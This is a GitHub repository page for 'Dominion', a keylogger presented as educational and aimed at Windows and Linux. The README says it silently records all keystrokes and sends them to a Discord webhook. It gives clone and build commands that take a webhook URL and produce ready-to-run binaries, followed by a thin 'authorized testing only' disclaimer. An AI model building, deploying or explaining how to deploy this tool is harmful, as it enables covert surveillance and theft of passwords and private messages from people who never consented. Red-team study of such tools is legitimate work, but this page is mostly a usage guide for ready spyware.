Skip to content

HackScaleTeam/Dominion

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

25 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Dominion

Dominion Banner Docs Twitter URL Twitter URL YouTube URL Donate with PayPal Donate Bitcoin

Dominion is a cross-platform educational keylogger for Red Teams and ethical hacking research.
It captures keystrokes and sends logs to a private Discord channel using webhooks.

Click here for a video demonstration


Features

  • Logs all keystrokes silently.
  • Sends logs to a private Discord webhook.
  • Supports Windows EXE (Wine) and Linux binary.
  • Simple automated builder (setup.py).

Quick Start

Clone this repository:

git clone https://github.com/HackScaleTeam/Dominion.git
cd Dominion

Run the setup script:

For Windows EXE (via Wine):

python3 setup.py --webhook YOUR_DISCORD_WEBHOOK --interval YOUR_TIME --windows

For Linux binary:

python3 setup.py --webhook YOUR_DISCORD_WEBHOOK --interval YOUR_TIME --linux

The setup script will:

  • Check your environment (Wine/Python)
  • Install missing dependencies
  • Build the binary to /dist/

Example:

python3 setup.py --webhook https://discord.com/api/webhooks/XXXXX/YYYYY --interval YOUR_TIME --windows

License

MIT License — see LICENSE.


Disclaimer

Dominion is for educational and authorized testing only.
Use it only on machines you own or have permission to test.

Support / Donate

If you find this project useful, you can support development via PayPal or Bitcoin.

Thanks for supporting the project! 💙

About

keylogger that logs keystrokes and sends them to a private Discord channel using webhooks. Fully automated

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages